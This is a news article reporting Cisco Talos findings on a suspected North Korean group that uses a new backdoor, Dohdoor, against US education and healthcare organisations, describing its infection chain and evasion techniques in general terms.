Cyber-crime Suspected Nork digital intruders caught breaking into US healthcare, education orgs Who is knocking at the Dohdoor? Jessica Lyons Fri 27 Feb 2026 // 19:59 UTC Digital intruders with possible links to North Korea have been infecting US education and healthcare sectors with a never-before-seen backdoor since at least December, according to security researchers. "We observed that the attacker had infected several educational institutions, including a university that is connected to several other institutions, indicating a potential wider attack surface," Cisco Talos researcher Chetan Raghuprasad told The Register . "Additionally, one of the affected entities was a healthcare facility, specifically for elderly care. "Based on the nature of the victimology in the current intrusions, the actor likely has a motive for financial gain," Raghuprasad added. Talos spotted the ongoing campaign , attributed to a group it tracks as UAT-10027, and says "with low confidence" that it's a North Korean crew based on similarities to Lazarus Group and other Pyongyang-backed gangs. The attackers likely gain initial access via social engineering and phishing, we're told, and the multi-stage infection ultimately delivers a new backdoor, Dohdoor, which shares similar technical characteristics to Lazarus Group's Lazarloader malware. After gaining access - potentially through a phishing email - the intruders execute a PowerShell downloader that runs a Windows batch script dropper from a remote staging server. The batch script then orchestrates a dynamic-link library (DLL) sideloading technique to execute a malicious Windows DLL named "propsys.dll" or "batmeter.dll." Brand new Dohdoor The DLL, which Talos calls "Dohdoor," operates as a loader, and it downloads, decrypts, and executes malicious payloads within legitimate Windows processes. This gives the intruders backdoor access to the victim's environment so it can download the next payload - a Cobalt Strike Beacon - into the machine's memory. UAT-10027 uses several stealthy techniques to help it avoid detection, including setting up command-and-control (C2) domains using Cloudflare infrastructure and using a technique called DNS-over-HTTPS to resolve the C2 server IP address. This helps the attackers bypass DNS security tools by ensuring all outbound traffic from compromised machines looks like legitimate HTTPS traffic to a trusted IP address. Dohoor also uses a technique called process hollowing to inject the payload into a legitimate Windows binary, allowing the malware to run without being detected. Additionally, Talos observed the new backdoor using an endpoint detection and response (EDR) bypass technique to bypass endpoint security tools that monitor Windows API calls. The backdoor does this by by unhooking system calls through user mode hooks in ntdll.dll. "The NTDLL unhooking technique used to bypass EDR monitoring by identifying and restoring system call stubs aligns with features found in earlier Lazarloader variants," Talos' researchers Alex Karkins and Chetan Raghuprasad said in a Thursday report. North Korea's Lazarus Group targets healthcare orgs with Medusa ransomware QR codes a powerful new phishing weapon in hands of Pyongyang cyberspies Amazon blocked 1,800 suspected North Korean scammers seeking jobs AI security startup CEO posts a job. Deepfake candidate applies, inner turmoil ensues They also noted that using DNS-over-HTTPS (DoH) via Cloudflare's DNS service, the process hollowing technique, and sideloading malicious DLLs in disguised file name "propsys.dll," have all been used in earlier Lazarus campaigns. "While UAT-10027's malware shares technical overlaps with the Lazarus Group, the campaign's focus on the education and health care sectors deviates from Lazarus' typical profile of cryptocurrency and defense targeting," the duo said. That assertion may be slightly out of date: Symantec and Carbon Black threat hunters earlier this week warned that Lazarus has begun using Medusa ransomware in extortion attacks targeting at least one US healthcare organization. One of Lazarus' most prolific subgroups, Andariel, which acts as the cyber-arm of North Korea's military intelligence agency, has previously used Maui and Play ransomware in its intrusions - including those targeting the healthcare sector. Additionally, Kimsuky , another one of Pyongyang's intelligence-gathering goon squads, has hit the education sector in its campaigns. ® Share More about Cybercrime Malware North Korea More like these × More about Cybercrime Malware North Korea Security Talos Narrower topics 2FA Advanced persistent threat Application Delivery Controller Authentication BEC Black Hat BSides Bug Bounty Center for Internet Security CHERI CISO Common Vulnerability Scoring System Cybersecurity Cybersecurity and Infrastructure Security Agency Cybersecurity Information Sharing Act Data Breach Data Protection Data Theft DDoS DEF CON Digital certificate Encryption End Point Protection Exploit Firewall Google Project Zero Hacker Hacking Hacktivism Identity Theft Incident response Infosec Infrastructure Security Kenna Security NCSAM NCSC Palo Alto Networks Password Personally Identifiable Information Phishing Quantum key distribution Ransomware Remote Access Trojan REvil RSA Conference Software Bill of Materials Spamming Spyware Surveillance TLS Trojan Trusted Platform Module Vulnerability Wannacry Zero trust Broader topics APAC More about Share POST A COMMENT More about Cybercrime Malware North Korea More like these × More about Cybercrime Malware North Korea Security Talos Narrower topics 2FA Advanced persistent threat Application Delivery Controller Authentication BEC Black Hat BSides Bug Bounty Center for Internet Security CHERI CISO Common Vulnerability Scoring System Cybersecurity Cybersecurity and Infrastructure Security Agency Cybersecurity Information Sharing Act Data Breach Data Protection Data Theft DDoS DEF CON Digital certificate Encryption End Point Protection Exploit Firewall Google Project Zero Hacker Hacking Hacktivism Identity Theft Incident response Infosec Infrastructure Security Kenna Security NCSAM NCSC Palo Alto Networks Password Personally Identifiable Information Phishing Quantum key distribution Ransomware Remote Access Trojan REvil RSA Conference Software Bill of Materials Spamming Spyware Surveillance TLS Trojan Trusted Platform Module Vulnerability Wannacry Zero trust Broader topics APAC TIP US OFF Send us news